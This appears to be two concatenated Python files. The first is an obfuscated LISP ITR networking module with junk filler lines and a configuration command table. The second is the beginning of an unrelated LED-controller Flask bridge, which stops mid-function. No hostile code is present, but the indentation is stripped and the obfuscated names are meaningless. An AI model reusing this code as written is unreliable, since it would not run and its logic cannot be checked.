def o00oOo0oOoo ( sources , dyn_eids , l2_overlay , pitr ) :
if ( l2_overlay ) :
i1I11IiI1iiII = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
oOo00o = "(not ether proto 0x806)"
iI1iIIIi1i = " or (udp src port 4342 and ip[28] == 0x28)"
OOoooooooO = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
if 17 - 17: OoO0O00 * OoOoOO00
ii11i = ""
o00Oo = ""
for II11 in sources :
O000oOo = II11
if ( lisp . lisp_is_mac_string ( II11 ) ) :
O000oOo = II11 . split ( "/" ) [ 0 ]
O000oOo = O000oOo . replace ( "-" , "" )
IiiIIi1 = [ ]
for O00o00O in range ( 0 , 12 , 2 ) : IiiIIi1 . append ( O000oOo [ O00o00O : O00o00O + 2 ] )
O000oOo = "ether host " + ":" . join ( IiiIIi1 )
if 28 - 28: o0oOOo0O0Ooo
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
ii11i += "{}" . format ( O000oOo )
if ( II11 not in dyn_eids ) : o00Oo += "{}" . format ( O000oOo )
if ( sources [ - 1 ] == II11 ) : break
ii11i += " or "
if ( II11 not in dyn_eids ) : o00Oo += " or "
if 86 - 86: II111iiii + ooOoO0o + IiII
if ( o00Oo [ - 4 : : ] == " or " ) : o00Oo = o00Oo [ 0 : - 4 ]
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if 14 - 14: I1ii11iIi11i + i11iIiiIii
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
II1II1iI = commands . getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
II1II1iI = ( II1II1iI != "" and II1II1iI [ 0 ] == " " )
Ooo = lisp . lisp_get_loopback_address ( ) if ( II1II1iI ) else None
if 88 - 88: OoooooooOO
iIiI1I1ii1I1 = ""
O00oO = lisp . lisp_get_all_addresses ( )
for O0O00OooO in O00oO :
if ( O0O00OooO == Ooo ) : continue
iIiI1I1ii1I1 += "{}" . format ( O0O00OooO )
if ( O00oO [ - 1 ] == O0O00OooO ) : break
iIiI1I1ii1I1 += " or "
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if ( ii11i != "" ) :
ii11i = " and (src net {})" . format ( ii11i )
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
if ( o00Oo != "" ) :
o00Oo = " and not (dst net {})" . format ( o00Oo )
if 48 - 48: iII111i + IiII
if ( iIiI1I1ii1I1 != "" ) :
iIiI1I1ii1I1 = " and not (dst host {})" . format ( iIiI1I1ii1I1 )
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
if 14 - 14: OOooOOo
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
if ( pitr ) :
o00Oo = ""
iIiI1I1ii1I1 = iIiI1I1ii1I1 . replace ( "dst " , "" )
if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
if 98 - 98: i1IIi
if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
if 12 - 12: iIii1I11I1II1 . Ii1I . I1ii11iIi11i % I1IiiI . II111iiii . oO0o
if 32 - 32: I1ii11iIi11i + IiII / O0 / OoOoOO00 * OoooooooOO % ooOoO0o
i1I11IiI1iiII = oOo00o + ii11i + o00Oo + iIiI1I1ii1I1
i1I11IiI1iiII += iI1iIIIi1i
i1I11IiI1iiII += OOoooooooO
if 50 - 50: OoO0O00
lisp . lprint ( "Using pcap filter: '{}'" . format ( i1I11IiI1iiII ) )
return ( i1I11IiI1iiII )
if 66 - 66: iIii1I11I1II1
if 41 - 41: I1Ii111 . O0 * I1IiiI * I1ii11iIi11i
if 100 - 100: iII111i
if 73 - 73: I1ii11iIi11i % II111iiii
if 79 - 79: OoOoOO00 + OoO0O00 - II111iiii + Ii1I
if 11 - 11: oO0o + iIii1I11I1II1
if 10 - 10: O0
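# Per-interface capture thread: open the device with pcappy (opens are
# serialized with pcap_lock), apply the filter, and loop forever feeding
# frames to the callback above.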
def Oo0000oOo ( device , pfilter , pcap_lock ) :
lisp . lisp_set_exception ( )
if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
pcap_lock . acquire ( )
i1I1iI = pcappy . open_live ( device , 9000 , 0 , 100 )
pcap_lock . release ( )
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
i1I1iI . filter = pfilter
i1I1iI . loop ( - 1 , ii1iIIiii1 , device )
return
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
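# Periodic Info-Request sender used for NAT traversal; re-arms itself every
# lisp.LISP_INFO_INTERVAL seconds via the timer stored in I11.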
def oOOoOOO0oo0 ( ) :
global I11
global II1Ii1iI1i
global II1iII1i
if 87 - 87: ooOoO0o / OoOoOO00 % o0oOOo0O0Ooo * oO0o
lisp . lisp_set_exception ( )
if 77 - 77: oO0o - Oo0Ooo - iIii1I11I1II1
if 16 - 16: OoO0O00 / iII111i / i1IIi . iII111i + oO0o
if 26 - 26: iIii1I11I1II1 + i1IIi / OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
Oo0 = [ II1Ii1iI1i , II1Ii1iI1i ,
oO0oIIII ]
lisp . lisp_build_info_requests ( Oo0 , None , lisp . LISP_CTRL_PORT )
if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
I11 . cancel ( )
I11 = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
oOOoOOO0oo0 , [ ] )
I11 . start ( )
return
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
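# "lisp map-resolver" command handler: apply the configuration, schedule a
# one-shot Map-Resolver test, and start the Info-Request timer immediately.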
def O0000oO0o00 ( kv_pair ) :
global II1iII1i
global iiI1iIiI
global I11
if 80 - 80: OoooooooOO + IiII
lispconfig . lisp_map_resolver_command ( kv_pair )
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 43 - 43: Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
I11 = threading . Timer ( 0 , oOOoOOO0oo0 , [ ] )
I11 . start ( )
return
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
def i1ii1iiIi1II ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
return
if 98 - 98: OoO0O00 - Ii1I . IiII % i11iIiiIii
if 69 - 69: I1ii11iIi11i + iII111i * O0 . OOooOOo % OoOoOO00
if 96 - 96: ooOoO0o . ooOoO0o - I11i / I11i
if 96 - 96: i11iIiiIii / I1IiiI - O0 . ooOoO0o
if 39 - 39: ooOoO0o / O0 * IiII
if 17 - 17: Ii1I / iIii1I11I1II1 - OoO0O00 + I1IiiI % OOooOOo
if 14 - 14: o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
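# "lisp xtr-parameters" command handler: apply the generic xTR settings,
# restart RLOC-probing if probing or NAT traversal was just enabled, record
# the ephemeral crypto port, and push the logging flags to the data-plane.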
def IiI1Iii1 ( kv_pair ) :
global i111I
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
iI11 = lisp . lisp_nat_traversal
OO0O00O = lisp . lisp_rloc_probing
if 31 - 31: i11iIiiIii
if 12 - 12: ooOoO0o
if 86 - 86: oO0o - OoO0O00
if 63 - 63: I1IiiI / OoOoOO00 + OoooooooOO . I11i . ooOoO0o
lispconfig . lisp_xtr_command ( kv_pair )
if 48 - 48: i1IIi - iII111i - i11iIiiIii . I11i - iII111i * I11i
if 60 - 60: OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
Oo0O0000Oo00o = ( iI11 == False and lisp . lisp_nat_traversal and lisp . lisp_rloc_probing )
if 20 - 20: OoO0O00 . I1IiiI * i11iIiiIii / i11iIiiIii
o00 = ( OO0O00O == False and lisp . lisp_rloc_probing )
if 4 - 4: OoO0O00
ooOO = 0
if ( o00 ) : ooOO = 1
if ( Oo0O0000Oo00o ) : ooOO = 5
if 5 - 5: OoooooooOO / o0oOOo0O0Ooo % I11i % OoO0O00 * iII111i + iIii1I11I1II1
if ( ooOO != 0 ) :
I11iiI11iiI = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( ooOO , I11iiI11iiI )
if 51 - 51: oO0o . iIii1I11I1II1 + OoO0O00 * Ii1I + i1IIi
if 81 - 81: O0 - Ii1I + Oo0Ooo
if 67 - 67: Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if ( lisp . lisp_crypto_ephem_port == None and lisp . lisp_data_plane_security ) :
O00oooo00o0O = i111I . getsockname ( ) [ 1 ]
lisp . lisp_crypto_ephem_port = O00oooo00o0O
lisp . lprint ( "Use port {} for lisp-crypto packets" . format ( O00oooo00o0O ) )
i1I111Ii = { "type" : "itr-crypto-port" , "port" : O00oooo00o0O }
lisp . lisp_write_to_dp_socket ( i1I111Ii )
if 31 - 31: I1IiiI
if 73 - 73: ooOoO0o . O0 / o0oOOo0O0Ooo - OoooooooOO % i11iIiiIii
if 80 - 80: Ii1I / ooOoO0o % O0 . Oo0Ooo
if 63 - 63: OOooOOo . II111iiii . I11i
if 46 - 46: ooOoO0o % IiII - o0oOOo0O0Ooo - Oo0Ooo - Ii1I / I11i
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 68 - 68: i1IIi - I1ii11iIi11i / Oo0Ooo % I11i . iII111i
if 9 - 9: IiII
if 48 - 48: o0oOOo0O0Ooo + o0oOOo0O0Ooo - Oo0Ooo
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
if 83 - 83: iIii1I11I1II1
if 72 - 72: I11i
if 87 - 87: i1IIi
if 48 - 48: Oo0Ooo * oO0o * iIii1I11I1II1 + i11iIiiIii - OoooooooOO
if 38 - 38: OoOoOO00 / iIii1I11I1II1 % i11iIiiIii - IiII * iII111i / OoOoOO00
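# Handle "nonce%" IPC messages: type "R" records a received request-nonce
# and starts echo-nonce mode; type "E" records an echoed nonce and stops
# request-nonce mode when it matches the nonce we sent.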
def iIII11I1I1II ( ipc ) :
ii1IIiII111I , O00OoOoO , ooO0o0oo , i1I1iIi1IiI = ipc . split ( "%" )
i1I1iIi1IiI = int ( i1I1iIi1IiI , 16 )
if 79 - 79: IiII % OoO0O00
Oo0oOO = lisp . lisp_get_echo_nonce ( None , ooO0o0oo )
if ( Oo0oOO == None ) : Oo0oOO = lisp . lisp_echo_nonce ( ooO0o0oo )
if 86 - 86: iIii1I11I1II1 / O0
if 17 - 17: II111iiii
if 9 - 9: OoooooooOO + oO0o
if 33 - 33: O0
if 39 - 39: I1IiiI + Oo0Ooo
if ( O00OoOoO == "R" ) :
Oo0oOO . request_nonce_rcvd = i1I1iIi1IiI
Oo0oOO . last_request_nonce_rcvd = lisp . lisp_get_timestamp ( )
Oo0oOO . echo_nonce_sent = i1I1iIi1IiI
Oo0oOO . last_new_echo_nonce_sent = lisp . lisp_get_timestamp ( )
lisp . lprint ( "Start echo-nonce mode for {}, nonce 0x{}" . format ( lisp . red ( Oo0oOO . rloc_str , False ) , lisp . lisp_hex_string ( i1I1iIi1IiI ) ) )
if 83 - 83: i1IIi
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
if ( O00OoOoO == "E" ) :
Oo0oOO . echo_nonce_rcvd = i1I1iIi1IiI
Oo0oOO . last_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
if ( Oo0oOO . request_nonce_sent == i1I1iIi1IiI ) :
III1IiI1i1i = lisp . bold ( "echoed nonce" , False )
lisp . lprint ( "Received {} {} from {}" . format ( III1IiI1i1i ,
lisp . lisp_hex_string ( i1I1iIi1IiI ) ,
lisp . red ( Oo0oOO . rloc_str , False ) ) )
if 94 - 94: iII111i - Oo0Ooo + oO0o
Oo0oOO . request_nonce_sent = None
lisp . lprint ( "Stop request-nonce mode for {}" . format ( lisp . red ( Oo0oOO . rloc_str , False ) ) )
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
Oo0oOO . last_good_echo_nonce_rcvd = lisp . lisp_get_timestamp ( )
else :
oO0o0Oo = "none"
if ( Oo0oOO . request_nonce_sent ) :
oO0o0Oo = lisp . lisp_hex_string ( Oo0oOO . request_nonce_sent )
if 76 - 76: ooOoO0o / OoOoOO00 + I1ii11iIi11i
lisp . lprint ( ( "Received echo-nonce 0x{} from {}, but request-" + "nonce is {}" ) . format ( lisp . lisp_hex_string ( i1I1iIi1IiI ) ,
lisp . red ( Oo0oOO . rloc_str , False ) , oO0o0Oo ) )
if 65 - 65: OoOoOO00
if 91 - 91: IiII + Ii1I % Ii1I - O0 - i11iIiiIii
return
if 84 - 84: Oo0Ooo % iII111i % OoooooooOO + OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
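# Command dispatch table mapping lisp.config clauses and "show" commands to
# their handler functions and the allowed keywords / value ranges.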
I1IiII1I1i1I1 = {
"lisp xtr-parameters" : [ IiI1Iii1 , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"multi-tenant-eid" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-device" : [ True ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ O0000oO0o00 , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp database-mapping" : [ i1ii1iiIi1II , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp itr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"show itr-map-cache" : [ IIiiIiI1 , { } ] ,
"show itr-rloc-probing" : [ I1i1iii , { } ] ,
"show itr-keys" : [ oo , { } ] ,
"show itr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 28 - 28: Oo0Ooo + IiII % II111iiii / OoO0O00 + i11iIiiIii
if 20 - 20: I1ii11iIi11i
if 3 - 3: OoO0O00 * i1IIi . I1IiiI . O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
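# Main entry: run the startup routine above, then select() over the data,
# NAT, IPC, and punt sockets, dispatching control packets and IPC commands
# until a socket returns EOF, and finally shut down cleanly.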
if ( I111I1Iiii1i ( ) == False ) :
lisp . lprint ( "lisp_itr_startup() failed" )
lisp . lisp_print_banner ( "ITR abnormal exit" )
exit ( 1 )
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
o0Oo0oo = [ i111I , oO0oIIII ,
II1Ii1iI1i , Oo0oO0oo0oO00 ]
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
Ii1Iiii = True
Oo = [ i111I ] * 3
i1IIii11i1I1 = [ II1Ii1iI1i ] * 3
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
while ( True ) :
try : OOOO , oO , ii1IIiII111I = select . select ( o0Oo0oo , [ ] , [ ] )
except : break
if 19 - 19: I1IiiI % Ii1I . IiII * ooOoO0o
if 89 - 89: OoOoOO00 . OOooOOo
if 7 - 7: oO0o % OoOoOO00 - I1IiiI + Oo0Ooo
if 70 - 70: II111iiii + I1Ii111 + i11iIiiIii - i1IIi / IiII
if ( lisp . lisp_ipc_data_plane and Oo0oO0oo0oO00 in OOOO ) :
lisp . lisp_process_punt ( Oo0oO0oo0oO00 , II1iII1i ,
iiI1iIiI )
if 40 - 40: I1ii11iIi11i * I1Ii111
if 38 - 38: O0 . Oo0Ooo + OoOoOO00 - oO0o
if 43 - 43: iII111i + Oo0Ooo / OoooooooOO
if 24 - 24: O0 + o0oOOo0O0Ooo * Ii1I - I1Ii111
if 10 - 10: i11iIiiIii
if ( i111I in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( Oo [ 0 ] ,
False )
if ( II11 == "" ) : break
if 52 - 52: Oo0Ooo . I11i / o0oOOo0O0Ooo + Ii1I % I11i
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 47 - 47: OoooooooOO / OOooOOo % OoO0O00 / Oo0Ooo - I1ii11iIi11i
lisp . lisp_parse_packet ( Oo , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 13 - 13: iII111i . I1IiiI * OOooOOo + Ii1I + I1IiiI - i11iIiiIii
if 79 - 79: ooOoO0o . oO0o / oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if ( II1Ii1iI1i in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( i1IIii11i1I1 [ 0 ] ,
False )
if ( II11 == "" ) : break
if 52 - 52: OoO0O00 * OoooooooOO
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
o0OO0oooo = lisp . lisp_parse_packet ( i1IIii11i1I1 , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 40 - 40: I1Ii111 - OoOoOO00 * I11i - IiII / OoOoOO00
if 71 - 71: oO0o / OoooooooOO % IiII / OoOoOO00 % I1Ii111
if 19 - 19: I1Ii111 + IiII / oO0o / II111iiii
if 92 - 92: i1IIi % ooOoO0o + ooOoO0o - iIii1I11I1II1 . Ii1I
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if ( o0OO0oooo ) :
I11iiI11iiI = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( 0 , I11iiI11iiI )
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
if 85 - 85: iIii1I11I1II1 . II111iiii
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if ( oO0oIIII in OOOO ) :
O00OoOoO , II11 , O00oooo00o0O , ii11iO000oo00OOOOO = lisp . lisp_receive ( oO0oIIII , True )
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if ( II11 == "" ) : break
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if ( O00OoOoO == "command" ) :
if ( ii11iO000oo00OOOOO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 94 - 94: i1IIi
if ( ii11iO000oo00OOOOO . find ( "nonce%" ) != - 1 ) :
iIII11I1I1II ( ii11iO000oo00OOOOO )
continue
if 36 - 36: I1IiiI + Oo0Ooo
lispconfig . lisp_process_command ( oO0oIIII , O00OoOoO ,
ii11iO000oo00OOOOO , "lisp-itr" , [ I1IiII1I1i1I1 ] )
elif ( O00OoOoO == "api" ) :
lisp . lisp_process_api ( "lisp-itr" , oO0oIIII , ii11iO000oo00OOOOO )
elif ( O00OoOoO == "data-packet" ) :
O0oOo00o0 ( ii11iO000oo00OOOOO , "ipc" )
else :
if ( lisp . lisp_is_rloc_probe_reply ( ii11iO000oo00OOOOO [ 0 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe request, using pcap" )
continue
if 46 - 46: iII111i
lisp . lisp_parse_packet ( II1iII1i , ii11iO000oo00OOOOO , II11 , O00oooo00o0O )
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
II1Ii11I111I ( )
lisp . lisp_print_banner ( "ITR normal exit" )
exit ( 0 )
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
opcBridge.py
import opc
import time
import os
import socket
import json
import threading
import queue
import datetime
import numpy as np
import yaml
from flask import Flask, request
from flask_restful import Resource, Api, reqparse
import logging
import requests
############################SUPPORT FUNCTIONS###################################
def getLocalIP():
'''Get our IP address'''
ipSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
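    # Connecting a UDP socket sends no packets; it only makes the OS choose the
    # local source address it would use to reach that destination.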
try:
ipSock.connect(('10.255.255.255', 1))
localIP = ipSock.getsockname()[0]
print('Local IP set to', localIP)
except Exception as e:
print(e)
print('Local IP detection failed, listening on localhost')
localIP = '127.0.0.1'
ipSock.close()
return localIP
def pixelsToJson(npArray):
    '''NumPy arrays do not serialize cleanly. This takes our NumPy array and converts
    it to a standard Python list so that we can easily dump it as JSON'''
lstOut = []
for i in npArray:
lstOut.append([int(i[0]), int(i[1]), int(i[2])])
return lstOut
def makeEightBit(value):
return min(255, max(0, int(value)))
def rgbSetBrightness(setBri, rgb):
currentBri = max(rgb)
if currentBri == 0:
ratio = 0
else:
ratio = setBri / currentBri
rgbOut = [rgb[0] * ratio, rgb[1] * ratio, rgb[2] * ratio]
return rgbOut
def brightnessChange(rgb, magnitude):
    '''Take an RGB value and a brightness change and return what its final value should be'''
currentBri = max(rgb)
if currentBri:
